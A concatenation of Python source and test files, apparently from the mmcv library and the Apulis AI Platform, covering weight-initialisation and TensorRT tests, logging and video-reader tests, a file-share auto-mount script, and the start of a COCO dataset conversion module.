version_str (str): The version string.
Returns:
tuple[int]: The version info in digits (integers).
"""
digit_version = []
for x in version_str.split('.'):
if x.isdigit():
digit_version.append(int(x))
elif x.find('rc') != -1:
patch_version = x.split('rc')
digit_version.append(int(patch_version[0]) - 1)
digit_version.append(int(patch_version[1]))
return tuple(digit_version)
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH', 'HOME']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(
cmd, stdout=subprocess.PIPE, env=env).communicate()[0]
return out
def get_git_hash(fallback='unknown', digits=None):
"""Get the git hash of the current repo.
Args:
fallback (str, optional): The fallback string when git hash is
unavailable. Defaults to 'unknown'.
digits (int, optional): kept digits of the hash. Defaults to None,
meaning all digits are kept.
Returns:
str: Git commit hash.
"""
if digits is not None and not isinstance(digits, int):
raise TypeError('digits must be None or an integer')
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
sha = out.strip().decode('ascii')
if digits is not None:
sha = sha[:digits]
except OSError:
sha = fallback
return sha
```
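A short sketch of how `digit_version` orders release candidates (illustrative; it assumes the function is re-exported as `mmcv.utils.digit_version`):
```python
from mmcv.utils import digit_version

assert digit_version('1.3.5') == (1, 3, 5)
# 'rc' versions sort below the final release: '1.3.0rc1' -> (1, 3, -1, 1)
assert digit_version('1.3.0rc1') < digit_version('1.3.0')
```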
#### File: tests/test_cnn/test_weight_init.py
```python
import numpy as np
import pytest
import torch
from torch import nn
from mmcv.cnn import (bias_init_with_prob, caffe2_xavier_init, constant_init,
kaiming_init, normal_init, uniform_init, xavier_init)
def test_constant_init():
conv_module = nn.Conv2d(3, 16, 3)
constant_init(conv_module, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
assert conv_module.bias.allclose(torch.zeros_like(conv_module.bias))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
constant_init(conv_module_no_bias, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
def test_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
xavier_init(conv_module, bias=0.1)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
xavier_init(conv_module, distribution='uniform')
# TODO: sanity check of weight distribution, e.g. mean, std
with pytest.raises(AssertionError):
xavier_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
xavier_init(conv_module_no_bias)
def test_normal_init():
conv_module = nn.Conv2d(3, 16, 3)
normal_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_uniform_init():
conv_module = nn.Conv2d(3, 16, 3)
uniform_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
uniform_init(conv_module_no_bias)
def test_kaiming_init():
conv_module = nn.Conv2d(3, 16, 3)
kaiming_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
kaiming_init(conv_module, distribution='uniform')
with pytest.raises(AssertionError):
kaiming_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
kaiming_init(conv_module_no_bias)
def test_caffe_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
caffe2_xavier_init(conv_module)
def test_bias_init_with_prob():
conv_module = nn.Conv2d(3, 16, 3)
prior_prob = 0.1
normal_init(conv_module, bias=bias_init_with_prob(0.1))
# TODO: sanity check of weight distribution, e.g. mean, std
bias = float(-np.log((1 - prior_prob) / prior_prob))
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, bias))
```
#### File: tests/test_ops/test_tensorrt.py
```python
import os
import numpy as np
import onnx
import pytest
import torch
try:
from mmcv.tensorrt import (TRTWraper, is_tensorrt_plugin_loaded, onnx2trt,
save_trt_engine)
except ImportError:
pytest.skip(
'TensorRT should be installed from source.', allow_module_level=True)
if not torch.cuda.is_available():
pytest.skip(
'CUDA is required for this test module', allow_module_level=True)
if not is_tensorrt_plugin_loaded():
pytest.skip(
        'Test requires TensorRT plugins to be compiled in mmcv',
allow_module_level=True)
class WrapFunction(torch.nn.Module):
def __init__(self, wrapped_function):
super(WrapFunction, self).__init__()
self.wrapped_function = wrapped_function
def forward(self, *args, **kwargs):
return self.wrapped_function(*args, **kwargs)
onnx_file = 'tmp.onnx'
trt_file = 'tmp.engine'
def test_roialign():
try:
from mmcv.ops import RoIAlign
except (ImportError, ModuleNotFoundError):
pytest.skip('test requires compilation')
# trt config
fp16_mode = False
max_workspace_size = 1 << 30
# roi align config
pool_h = 2
pool_w = 2
spatial_scale = 1.0
sampling_ratio = 2
inputs = [([[[[1., 2.], [3., 4.]]]], [[0., 0., 0., 1., 1.]]),
([[[[1., 2.], [3., 4.]], [[4., 3.],
[2., 1.]]]], [[0., 0., 0., 1., 1.]]),
([[[[1., 2., 5., 6.], [3., 4., 7., 8.], [9., 10., 13., 14.],
[11., 12., 15., 16.]]]], [[0., 0., 0., 3., 3.]])]
wrapped_model = RoIAlign((pool_w, pool_h), spatial_scale, sampling_ratio,
'avg', True).cuda()
for case in inputs:
np_input = np.array(case[0], dtype=np.float32)
np_rois = np.array(case[1], dtype=np.float32)
input = torch.from_numpy(np_input).cuda()
rois = torch.from_numpy(np_rois).cuda()
with torch.no_grad():
torch.onnx.export(
wrapped_model, (input, rois),
onnx_file,
export_params=True,
keep_initializers_as_inputs=True,
input_names=['input', 'rois'],
output_names=['roi_feat'],
opset_version=11)
onnx_model = onnx.load(onnx_file)
        # create trt engine and wrapper
opt_shape_dict = {
'input': [list(input.shape),
list(input.shape),
list(input.shape)],
'rois': [list(rois.shape),
list(rois.shape),
list(rois.shape)]
}
trt_engine = onnx2trt(
onnx_model,
opt_shape_dict,
fp16_mode=fp16_mode,
max_workspace_size=max_workspace_size)
save_trt_engine(trt_engine, trt_file)
trt_model = TRTWraper(trt_file, ['input', 'rois'], ['roi_feat'])
with torch.no_grad():
trt_outputs = trt_model({'input': input, 'rois': rois})
trt_roi_feat = trt_outputs['roi_feat']
# compute pytorch_output
with torch.no_grad():
pytorch_roi_feat = wrapped_model(input, rois)
# allclose
if os.path.exists(onnx_file):
os.remove(onnx_file)
if os.path.exists(trt_file):
os.remove(trt_file)
assert torch.allclose(pytorch_roi_feat, trt_roi_feat)
def test_scatternd():
def func(data):
data[:, :-2] += 1
data[:2, :] -= 1
return data
data = torch.zeros(4, 4).cuda()
wrapped_model = WrapFunction(func).eval().cuda()
input_names = ['input']
output_names = ['output']
with torch.no_grad():
torch.onnx.export(
wrapped_model, (data.clone(), ),
onnx_file,
export_params=True,
keep_initializers_as_inputs=True,
input_names=input_names,
output_names=output_names,
opset_version=11)
onnx_model = onnx.load(onnx_file)
    # create trt engine and wrapper
opt_shape_dict = {
'input': [list(data.shape),
list(data.shape),
list(data.shape)],
}
# trt config
fp16_mode = False
max_workspace_size = 1 << 30
trt_engine = onnx2trt(
onnx_model,
opt_shape_dict,
fp16_mode=fp16_mode,
max_workspace_size=max_workspace_size)
save_trt_engine(trt_engine, trt_file)
trt_model = TRTWraper(trt_file, input_names, output_names)
with torch.no_grad():
trt_outputs = trt_model({'input': data.clone()})
trt_results = trt_outputs['output']
# compute pytorch_output
with torch.no_grad():
pytorch_results = wrapped_model(data.clone())
# allclose
if os.path.exists(onnx_file):
os.remove(onnx_file)
if os.path.exists(trt_file):
os.remove(trt_file)
assert torch.allclose(pytorch_results, trt_results)
```
#### File: tests/test_utils/test_logging.py
```python
import logging
import platform
import tempfile
from unittest.mock import patch
import pytest
from mmcv import get_logger, print_log
if platform.system() == 'Windows':
import regex as re
else:
import re
@patch('torch.distributed.get_rank', lambda: 0)
@patch('torch.distributed.is_initialized', lambda: True)
@patch('torch.distributed.is_available', lambda: True)
def test_get_logger_rank0():
logger = get_logger('rank0.pkg1')
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 1
assert isinstance(logger.handlers[0], logging.StreamHandler)
assert logger.handlers[0].level == logging.INFO
logger = get_logger('rank0.pkg2', log_level=logging.DEBUG)
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 1
assert logger.handlers[0].level == logging.DEBUG
with tempfile.NamedTemporaryFile() as f:
logger = get_logger('rank0.pkg3', log_file=f.name)
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 2
assert isinstance(logger.handlers[0], logging.StreamHandler)
assert isinstance(logger.handlers[1], logging.FileHandler)
logger_pkg3 = get_logger('rank0.pkg3')
assert id(logger_pkg3) == id(logger)
logger_pkg3 = get_logger('rank0.pkg3.subpkg')
assert logger_pkg3.handlers == logger_pkg3.handlers
@patch('torch.distributed.get_rank', lambda: 1)
@patch('torch.distributed.is_initialized', lambda: True)
@patch('torch.distributed.is_available', lambda: True)
def test_get_logger_rank1():
logger = get_logger('rank1.pkg1')
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 1
assert isinstance(logger.handlers[0], logging.StreamHandler)
assert logger.handlers[0].level == logging.INFO
with tempfile.NamedTemporaryFile() as f:
logger = get_logger('rank1.pkg2', log_file=f.name)
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 1
assert logger.handlers[0].level == logging.INFO
def test_print_log_print(capsys):
print_log('welcome', logger=None)
out, _ = capsys.readouterr()
assert out == 'welcome\n'
def test_print_log_silent(capsys, caplog):
print_log('welcome', logger='silent')
out, _ = capsys.readouterr()
assert out == ''
assert len(caplog.records) == 0
def test_print_log_logger(caplog):
print_log('welcome', logger='mmcv')
assert caplog.record_tuples[-1] == ('mmcv', logging.INFO, 'welcome')
print_log('welcome', logger='mmcv', level=logging.ERROR)
assert caplog.record_tuples[-1] == ('mmcv', logging.ERROR, 'welcome')
with tempfile.NamedTemporaryFile() as f:
logger = get_logger('abc', log_file=f.name)
print_log('welcome', logger=logger)
assert caplog.record_tuples[-1] == ('abc', logging.INFO, 'welcome')
with open(f.name, 'r') as fin:
log_text = fin.read()
regex_time = r'\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}'
match = re.fullmatch(regex_time + r' - abc - INFO - welcome\n',
log_text)
assert match is not None
def test_print_log_exception():
with pytest.raises(TypeError):
print_log('welcome', logger=0)
```
#### File: tests/test_video/test_reader.py
```python
import os
import os.path as osp
import shutil
import tempfile
from collections import OrderedDict
import pytest
import mmcv
class TestCache:
def test_init(self):
with pytest.raises(ValueError):
mmcv.Cache(0)
cache = mmcv.Cache(100)
assert cache.capacity == 100
assert cache.size == 0
def test_put(self):
cache = mmcv.Cache(3)
for i in range(1, 4):
cache.put(f'k{i}', i)
assert cache.size == i
assert cache._cache == OrderedDict([('k1', 1), ('k2', 2), ('k3', 3)])
cache.put('k4', 4)
assert cache.size == 3
assert cache._cache == OrderedDict([('k2', 2), ('k3', 3), ('k4', 4)])
cache.put('k2', 2)
assert cache._cache == OrderedDict([('k2', 2), ('k3', 3), ('k4', 4)])
def test_get(self):
cache = mmcv.Cache(3)
assert cache.get('key_none') is None
assert cache.get('key_none', 0) == 0
cache.put('k1', 1)
assert cache.get('k1') == 1
class TestVideoReader:
@classmethod
def setup_class(cls):
cls.video_path = osp.join(osp.dirname(__file__), '../data/test.mp4')
cls.num_frames = 168
cls.video_url = 'https://www.learningcontainer.com/wp-content/uploads/2020/05/sample-mp4-file.mp4' # noqa: E501
def test_load(self):
# read from video file
v = mmcv.VideoReader(self.video_path)
assert v.width == 294
assert v.height == 240
assert v.fps == 25
assert v.frame_cnt == self.num_frames
assert len(v) == self.num_frames
assert v.opened
import cv2
assert isinstance(v.vcap, type(cv2.VideoCapture()))
# read from video url
v = mmcv.VideoReader(self.video_url)
assert v.width == 320
assert v.height == 240
assert v.fps == 15
assert v.frame_cnt == 1889
assert len(v) == 1889
assert v.opened
assert isinstance(v.vcap, type(cv2.VideoCapture()))
def test_read(self):
v = mmcv.VideoReader(self.video_path)
img = v.read()
assert int(round(img.mean())) == 94
img = v.get_frame(63)
assert int(round(img.mean())) == 94
img = v[64]
assert int(round(img.mean())) == 205
img = v[-104]
assert int(round(img.mean())) == 205
img = v[63]
assert int(round(img.mean())) == 94
img = v[-105]
assert int(round(img.mean())) == 94
img = v.read()
assert int(round(img.mean())) == 205
with pytest.raises(IndexError):
v.get_frame(self.num_frames + 1)
with pytest.raises(IndexError):
v[-self.num_frames - 1]
def test_slice(self):
v = mmcv.VideoReader(self.video_path)
imgs = v[-105:-103]
assert int(round(imgs[0].mean())) == 94
assert int(round(imgs[1].mean())) == 205
assert len(imgs) == 2
imgs = v[63:65]
assert int(round(imgs[0].mean())) == 94
assert int(round(imgs[1].mean())) == 205
assert len(imgs) == 2
imgs = v[64:62:-1]
assert int(round(imgs[0].mean())) == 205
assert int(round(imgs[1].mean())) == 94
assert len(imgs) == 2
imgs = v[:5]
assert len(imgs) == 5
for img in imgs:
assert int(round(img.mean())) == 94
imgs = v[165:]
assert len(imgs) == 3
for img in imgs:
assert int(round(img.mean())) == 0
imgs = v[-3:]
assert len(imgs) == 3
for img in imgs:
assert int(round(img.mean())) == 0
def test_current_frame(self):
v = mmcv.VideoReader(self.video_path)
assert v.current_frame() is None
v.read()
img = v.current_frame()
assert int(round(img.mean())) == 94
def test_position(self):
v = mmcv.VideoReader(self.video_path)
assert v.position == 0
for _ in range(10):
v.read()
assert v.position == 10
v.get_frame(99)
assert v.position == 100
def test_iterator(self):
cnt = 0
for img in mmcv.VideoReader(self.video_path):
cnt += 1
assert img.shape == (240, 294, 3)
assert cnt == self.num_frames
def test_with(self):
with mmcv.VideoReader(self.video_path) as v:
assert v.opened
assert not v.opened
def test_cvt2frames(self):
v = mmcv.VideoReader(self.video_path)
frame_dir = tempfile.mkdtemp()
v.cvt2frames(frame_dir)
assert osp.isdir(frame_dir)
for i in range(self.num_frames):
filename = f'{frame_dir}/{i:06d}.jpg'
assert osp.isfile(filename)
os.remove(filename)
v = mmcv.VideoReader(self.video_path)
v.cvt2frames(frame_dir, show_progress=False)
assert osp.isdir(frame_dir)
for i in range(self.num_frames):
filename = f'{frame_dir}/{i:06d}.jpg'
assert osp.isfile(filename)
os.remove(filename)
v = mmcv.VideoReader(self.video_path)
v.cvt2frames(
frame_dir,
file_start=100,
filename_tmpl='{:03d}.JPEG',
start=100,
max_num=20)
assert osp.isdir(frame_dir)
for i in range(100, 120):
filename = f'{frame_dir}/{i:03d}.JPEG'
assert osp.isfile(filename)
os.remove(filename)
shutil.rmtree(frame_dir)
def test_frames2video(self):
v = mmcv.VideoReader(self.video_path)
frame_dir = tempfile.mkdtemp()
v.cvt2frames(frame_dir)
assert osp.isdir(frame_dir)
for i in range(self.num_frames):
filename = f'{frame_dir}/{i:06d}.jpg'
assert osp.isfile(filename)
out_filename = osp.join(tempfile.gettempdir(), 'mmcv_test.avi')
mmcv.frames2video(frame_dir, out_filename)
v = mmcv.VideoReader(out_filename)
assert v.fps == 30
assert len(v) == self.num_frames
mmcv.frames2video(
frame_dir,
out_filename,
fps=25,
start=10,
end=50,
show_progress=False)
v = mmcv.VideoReader(out_filename)
assert v.fps == 25
assert len(v) == 40
for i in range(self.num_frames):
filename = f'{frame_dir}/{i:06d}.jpg'
os.remove(filename)
shutil.rmtree(frame_dir)
os.remove(out_filename)
``` |
{
"source": "jinlmsft/Apulis-AI-Platform",
"score": 3
} |
#### File: storage/auto_share/auto_share.py
```python
import time
import os
from datetime import datetime
import yaml
import logging
import logging.config
import argparse
import textwrap
import socket
import subprocess
import re
import sys
import getpass
import copy
def istrue( config, arg, default=False):
if arg in config:
val = config[arg]
if isinstance( val, bool):
return val
elif isinstance( val, basestring):
return val.lower()[0] == 'y'
else:
return val
else:
return default
def tolist( server ):
if isinstance( server, basestring):
return [server]
else:
return server
def pipe_with_output( cmd1, cmd2, verbose=False ):
try:
# https://stackoverflow.com/questions/4814970/subprocess-check-output-doesnt-seem-to-exist-python-2-6-5
if verbose:
logging.debug ( "Pipe: %s | %s " % (cmd1, cmd2 ) )
p1 = subprocess.Popen( cmd1.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE )
p2 = subprocess.Popen( cmd2.split(), stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE )
output = p2.communicate()[0]
if verbose:
logging.debug ( output )
except subprocess.CalledProcessError as e:
print "Exception " + str(e.returncode) + ", output: " + e.output.strip()
if verbose:
logging.debug ( "Exception: %s, output: %s" % (str(e.returncode), e.output.strip()) )
return ""
return output
def exec_with_output( cmd, verbose=False, max_run=30 ):
try:
# https://stackoverflow.com/questions/4814970/subprocess-check-output-doesnt-seem-to-exist-python-2-6-5
cmds = cmd.split()
if verbose:
logging.debug ( "Execute: %s" % cmd )
sp = subprocess.Popen( cmds, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True )
output, err = sp.communicate()
count = 0
while sp.poll() == None and count < max_run:
time.sleep(1)
count += 1
if verbose:
logging.debug ( "Return: %d, Output: %s, Error: %s" % (sp.returncode, output, err) )
return (sp.returncode, output, err)
except subprocess.CalledProcessError as e:
print "Exception " + str(e.returncode) + ", output: " + e.output.strip()
if verbose:
logging.debug ( "Exception: %s, output: %s" % (str(e.returncode), e.output.strip()) )
return (e.returncode, e.output, "Error")
def exec_wo_output( cmd, verbose=False ):
try:
# https://stackoverflow.com/questions/4814970/subprocess-check-output-doesnt-seem-to-exist-python-2-6-5
if verbose:
logging.debug ( "Execute: %s" % cmd )
os.system( cmd )
except subprocess.CalledProcessError as e:
print "Exception " + str(e.returncode) + ", output: " + e.output.strip()
def mount_one_hdfs( v, physicalmountpoint, server, verbose=True):
exec_with_output( "hadoop-fuse-dfs hdfs://%s %s %s " % (server, physicalmountpoint, v["options"]), verbose=verbose )
def test_one_hdfs( server, verbose=True):
(retcode, output, err) = exec_with_output("hdfs dfs -test -e hdfs://%s" % server, verbose=verbose)
if err.find("not supported in state standby")>=0:
# standby namenode
logging.debug ( "HDFS namenode %s is standby namenode" % server )
return False
elif err.find("Connection refused")>=0:
logging.debug ( "HDFS namenode %s fails" % server )
return False
elif err.find("Incomplete HDFS URI")>=0:
logging.debug ( "Wrongly formatted namenode %s: fails" % server )
return False
else:
logging.debug ( "HDFS namenode %s is active" % server )
return True
# Mount HDFS, with support of high availablability
def mount_hdfs( v, physicalmountpoint, verbose=True ):
servers = tolist(v["server"])
if len(servers)==0:
# No HDFS server specified, unable to mount
return False
elif len(servers)==1:
mount_one_hdfs( v, physicalmountpoint, servers[0], verbose=verbose)
return True
else:
for server in servers:
if test_one_hdfs(server, verbose):
mount_one_hdfs( v, physicalmountpoint, server, verbose=verbose)
return True
from shutil import copyfile, copytree
from jinja2 import Environment, FileSystemLoader, Template
def render_template(template_file, target_file, config, verbose=False):
filename, file_extension = os.path.splitext(template_file)
basename = os.path.basename(template_file)
if ("render-exclude" in config and basename in config["render-exclude"] ):
# Don't render/copy the file.
return
if ("render-by-copy-ext" in config and file_extension in config["render-by-copy-ext"]) or ("render-by-copy" in config and basename in config["render-by-copy"]):
copyfile(template_file, target_file)
if verbose:
logging.debug ( "Copy tempalte " + template_file + " --> " + target_file )
elif ("render-by-line-ext" in config and file_extension in config["render-by-line-ext"]) or ("render-by-line" in config and basename in config["render-by-line"]):
if verbose:
logging.debug ( "Render tempalte " + template_file + " --> " + target_file + " Line by Line .... " )
ENV_local = Environment(loader=FileSystemLoader("/"))
with open(target_file, 'w') as f:
with open(template_file, 'r') as fr:
for line in fr:
logging.debug( "Read: " + line )
try:
template = ENV_local.Template(line)
content = template.render(cnf=config)
logging.debug( content )
f.write(content+"\n")
except:
pass
fr.close()
f.close()
else:
if verbose:
logging.debug( "Render tempalte " + template_file + " --> " + target_file )
try:
ENV_local = Environment(loader=FileSystemLoader("/"))
template = ENV_local.get_template(os.path.abspath(template_file))
content = template.render(cnf=config)
with open(target_file, 'w') as f:
f.write(content)
f.close()
except Exception as e:
logging.debug ( "!!! Failure !!! in render template " + template_file )
logging.debug( e )
pass
def mount_glusterfs( v, physicalmountpoint, verbose=True):
mount_file_basename = physicalmountpoint[1:].replace("/","-")
mount_file = os.path.join( "/etc/systemd/system", mount_file_basename + ".mount")
glusterfsconfig = copy.deepcopy(v)
glusterfsconfig["physicalmountpoint"] = physicalmountpoint
logging.debug( "Rendering ./glusterfs.mount --> %s" % mount_file )
render_template( "./glusterfs.mount", mount_file, glusterfsconfig, verbose=verbose )
def mount_fileshare(verbose=True):
with open("mounting.yaml", 'r') as datafile:
config = yaml.load(datafile)
datafile.close()
# print config
allmountpoints = config["mountpoints"]
nMounts = 0
for k,v in allmountpoints.iteritems():
if "curphysicalmountpoint" in v and istrue(v, "autoshare", True):
physicalmountpoint = v["curphysicalmountpoint"]
# gives mounted information only, would not write anything or carry out mount action
output = pipe_with_output("mount", "grep %s" % v["curphysicalmountpoint"], verbose=False)
umounts = []
existmounts = []
for line in output.splitlines():
words = line.split()
# pitfall: words[2] might be prefix of v["curphysicalmountpoint"], then a mount point would be missed
# so we should check whether they are equal, if so, we know the specified path on NFS node was previously mounted to infra/worker.
if len(words)>3 and words[1]=="on" and words[2] == v["curphysicalmountpoint"]:
if verbose:
logging.debug( "%s on %s" % (words[0], words[2]) )
# check if mount point exists, automatic create directory if non exist
bMount = False
for mountpoint in v["mountpoints"]:
try:
targetdir = os.path.join(physicalmountpoint, mountpoint)
if os.path.exists( targetdir ):
bMount = True
else:
try:
os.system("mkdir -m 0777 "+targetdir)
except:
logging.debug( "Failed to create directory " + targetdir )
if os.path.exists( targetdir ):
bMount = True
except:
logging.debug( "Failed to check for existence of directory " + targetdir )
if not bMount:
# Failing
umounts.append( words[2] )
else:
existmounts.append( words[2])
umounts.sort()
# Examine mount point, unmount those file shares that fails.
for um in umounts:
cmd = "umount -v %s" % um
logging.debug( "Mount fails, to examine mount %s " % um )
exec_with_output( cmd, verbose=verbose )
time.sleep(3)
if len(existmounts) <= 0:
nMounts += 1
if v["type"] == "azurefileshare":
exec_with_output( "mount -t cifs %s %s -o %s " % (v["url"], physicalmountpoint, v["options"] ), verbose=verbose )
elif v["type"] == "glusterfs":
mount_glusterfs( v, physicalmountpoint, verbose=verbose)
exec_with_output( "mount -t glusterfs -o %s %s:%s %s " % (v["options"], v["node"], v["filesharename"], physicalmountpoint ), verbose=verbose )
elif v["type"] == "nfs":
exec_with_output( "mount %s:%s %s -o %s " % (v["server"], v["filesharename"], physicalmountpoint, v["options"]), verbose=verbose )
elif v["type"] == "ceph":
exec_with_output( "%s" % (v["mountcmd"]), verbose=verbose)
elif v["type"] == "hdfs":
mount_hdfs( v, physicalmountpoint, verbose=verbose )
elif v["type"] == "local" or v["type"] == "localHDD":
exec_with_output( "mount %s %s " % ( v["device"], physicalmountpoint ), verbose=verbose )
elif v["type"] == "ceph":
exec_with_output( "%s" % (v["mountcmd"]), verbose=verbose)
else:
nMounts -= 1
if nMounts > 0:
time.sleep(1)
def link_fileshare():
with open("mounting.yaml", 'r') as datafile:
config = yaml.load(datafile)
datafile.close()
# print config
allmountpoints = config["mountpoints"]
(retcode, output, err) = exec_with_output("sudo mount")
for k,v in allmountpoints.iteritems():
if "mountpoints" in v and v["type"]!="emptyDir":
if output.find(v["curphysicalmountpoint"]) < 0:
logging.debug("!!!Warning!!! %s has not been mounted at %s " % (k, v["curphysicalmountpoint"]))
logging.debug(output)
else:
for basename in v["mountpoints"]:
dirname = os.path.join(v["curphysicalmountpoint"], basename )
exec_wo_output("sudo mkdir -p %s; " % dirname)
exec_wo_output("sudo chmod ugo+rwx %s; " % dirname)
for basename in v["mountpoints"]:
dirname = os.path.join(v["curphysicalmountpoint"], basename )
storage_mount_path = config["storage-mount-path"]
if ("vc" in v) and (v["vc"] != ""):
storage_mount_path = os.path.join(config["dltsdata-storage-mount-path"], v["vc"])
exec_wo_output("sudo mkdir -p %s; " % storage_mount_path)
linkdir = os.path.join(storage_mount_path, basename)
exec_wo_output("if [ ! -e %s ]; then sudo ln -s %s %s; fi; " % (linkdir, dirname, linkdir))
def start_logging( logdir = '/var/log/auto_share' ):
if not os.path.exists( logdir ):
os.system("mkdir -p " + logdir )
with open('logging.yaml') as f:
logging_config = yaml.load(f)
f.close()
# print logging_config
logging.config.dictConfig(logging_config)
logging.debug (".................... Start auto_share at %s .......................... " % datetime.now() )
logging.debug ( "Argument : %s" % sys.argv )
if __name__ == '__main__':
parser = argparse.ArgumentParser( prog='auto_share.py',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent('''\
Automatically monitor and mount file share.
''') )
parser.add_argument('nargs', nargs=argparse.REMAINDER,
help="Additional command argument",
)
dir_path = os.path.dirname(os.path.realpath(__file__))
os.chdir(dir_path)
args = parser.parse_args()
start_logging()
logging.debug( "Run as user %s" % getpass.getuser() )
try:
mount_fileshare()
link_fileshare()
except:
logging.debug( "Exception when mounting files... " )
else:
logging.debug( "Examined all mounting points... " )
logging.debug( "End auto_share ... " )
```
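A minimal sketch of the structure `mount_fileshare()` expects from `mounting.yaml`, shown as the Python dict `yaml.load` would return; the concrete values are illustrative assumptions inferred from the keys the script reads, not the platform's actual defaults:
```python
config = {
    "storage-mount-path": "/dlwsdata",
    "dltsdata-storage-mount-path": "/dltsdata",
    "mountpoints": {
        "nfsshare": {
            "type": "nfs",                 # other branches: azurefileshare, glusterfs, hdfs, ceph, local
            "server": "192.168.0.10",      # illustrative address
            "filesharename": "/data/share",
            "curphysicalmountpoint": "/mntdlws/nfs",
            "options": "rw,hard,intr",
            "autoshare": True,
            "mountpoints": ["jobfiles", "storage", "work"],
        },
    },
}
```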
#### File: src/ClusterManager/dataset_convert.py
```python
import json
import os
import time
import argparse
import uuid
import subprocess
import sys
import datetime
reload(sys)
sys.setdefaultencoding('utf8')
import yaml
from jinja2 import Environment, FileSystemLoader, Template
import base64
import re
import thread
import threading
import random
import shutil
import textwrap
import logging
import logging.config
from pycocotools import mask
from multiprocessing import Process, Manager
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),"../storage"))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),"../utils"))
from jobs_tensorboard import GenTensorboardMeta
import k8sUtils
from config import config
from DataHandler import DataHandler
from cluster_manager import setup_exporter_thread, manager_iteration_histogram, register_stack_trace_dump, update_file_modification_time
logger = logging.getLogger(__name__)
def PolygonArea(corners):
n = len(corners) # of corners
area = 0.0
for i in range(n):
j = (i + 1) % n
area += corners[i][0] * corners[j][1]
area -= corners[j][0] * corners[i][1]
area = abs(area) / 2.0
return area
def segmentationToCorner(segmentation):
tmp = []
for i in range(0,len(segmentation),2):
tmp.append([segmentation[i],segmentation[i+1]])
return tmp
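def _example_polygon_area():
    """Illustrative sketch, not part of the original file.

    A flat COCO-style polygon [0,0, 4,0, 4,3, 0,3] describes a 4x3 rectangle,
    so the shoelace formula in PolygonArea should return 12.
    """
    corners = segmentationToCorner([0, 0, 4, 0, 4, 3, 0, 3])
    assert corners == [[0, 0], [4, 0], [4, 3], [0, 3]]
    assert PolygonArea(corners) == 12.0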
def create_log(logdir = '/var/log/dlworkspace'):
if not os.path.exists(logdir):
os.system("mkdir -p " + logdir)
with open('logging.yaml') as f:
logging_config = yaml.load(f)
f.close()
logging_config["handlers"]["file"]["filename"] = logdir+"/dataconvert.log"
logging.config.dictConfig(logging_config)
def insert_status_to_dataset(datasetId,projectId,status,out_path=None):
dataset_info_path = os.path.join(config["data_platform_path"],"private/account/%s/membership.json" % (projectId))
with open(dataset_info_path,"r") as f:
infos = json.loads(f.read())
if "dataSets" in infos:
if datasetId in infos["dataSets"]:
one_info = infos["dataSets"][datasetId]
if "convertStatus" in one_info:
logging.info("dataset: %s %s update status again!" % (projectId,datasetId))
one_info["convertStatus"] = status
one_info["convertOutPath"] = out_path
with open(dataset_info_path,"w") as f:
f.write(json.dumps(infos,indent=4, separators=(',', ':')))
def mkdirs(path):
if not os.path.exists(path):
os.makedirs(path)
index = 0
def merge_json_to_coco_dataset(list_ppath,json_path,coco_file_path,prefix="",args=None,category_path=None):
coco = {}
coco["images"] = []
coco["categories"] = []
coco["annotations"] = []
with open(os.path.join(list_ppath, "list.json"), "r") as f:
data = json.load(f)
ImgIDs = data.get("ImgIDs",[])
suffixs = data.get("suffixs",[])
categories = {}
categories_total = None
if os.path.exists(category_path):
with open(category_path, "r") as f2:
categories_total = json.load(f2)["categories"]
for index,ImgID in enumerate(ImgIDs):
new_image_id = ImgID
anno_path = os.path.join(json_path, 'images', "{}.json".format(ImgID))
if not os.path.exists(anno_path):
# compatible with image.suffix.json
new_anno_path = os.path.join(json_path, 'images', "{}{}.json".format(ImgID,suffixs[index]))
if os.path.exists(new_anno_path):
anno_path = new_anno_path
else:
continue
with open(anno_path, "r") as f:
json_dict = json.load(f)
json_dict["images"][0]["file_name"] = "{}.jpg".format(new_image_id)
json_dict["images"][0]["id"] = new_image_id
if json_dict.get("categories"):
categories_total = json_dict.get("categories")
for i in json_dict["annotations"]:
i["image_id"] = new_image_id
global index
i["id"] = index
index += 1
if i["category_id"] not in categories:
categories[i["category_id"]] = {"id":i["category_id"],"name":i["category_id"],"supercategory":i["category_id"]}
if "category_name" in i:
categories[i["category_id"]]["name"] = i["category_name"]
if "supercategory" in i:
categories[i["category_id"]]["supercategory"] = i["supercategory"]
